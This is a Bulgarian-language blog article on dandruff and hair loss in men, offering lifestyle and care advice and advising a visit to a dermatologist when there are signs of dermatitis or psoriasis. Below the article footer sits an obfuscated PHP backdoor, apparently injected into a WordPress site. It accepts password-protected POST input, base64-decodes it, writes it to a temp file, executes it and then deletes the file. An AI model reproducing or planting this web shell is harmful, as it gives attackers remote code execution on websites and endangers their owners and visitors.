Пърхот и косопад при мъжете | Косопад

Пърхот и косопад при мъжете

kosopad-parhot

Поради редица фактори, като стрес, високи температури и пр, мъжката коса реагира, като произвежда пърхот или капе. Здравословният начин на живот и употребата на подходящите продукти могат да ви решат проблема напълно.

Косата, както и кожата, се обновява на всеки 20- 30 дни. Но когато процесът се ускори, скалпът започва да страда. Появата на пърхот и косопад са най- честите прояви.

Ендокринни разстройства, алергия и пърхот

Пърхотът може да се дължи на ендокринен проблем или алергия, причинена от замърсяването на околната среда, стресът, преумората и неправилното хранене. Това често води до пърхот.

parhot-maje

Косопадът при мъжете се свързва с производството на мазен пърхот. Появява се при мазен скалп и образува жълти люспи, които падат лесно и причинят сърбежи. Сухият пърхот пада и се събира по раменете, но с него можете по- лесно да се справите.

Съвети срещу пърхот

Когато преминаваме през период на стрес или дисбаланс, трябва да поддържаме или да възстановим добрите си навици, като балансирано хранене, здрав сън и движение. Ако пърхотът е съчетан със зачервяване и сърбежи, може да става въпрос за себореен дерматит или за псориазис. Ако имате такива съмнение, обърнете се към дерматолог.

Косата расте постоянно. Едни косми умират, други се раждат. Всеки ден губим до 100 косъма. Това е нормално явление, което може да се влоши от обстоятелствата. Лятото и зимата са сезони, в които косата е изложена на повече външна агресия.

Различни фактори могат да причинят значителен косопад. Ако се дължи на някакъв вид травма, може да продължи от два до четири месеца. Здравословният начин на живот и подходящата козметика могат да помогнат при преждевременния косопад.

25. октомври 2015 13:44:51 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}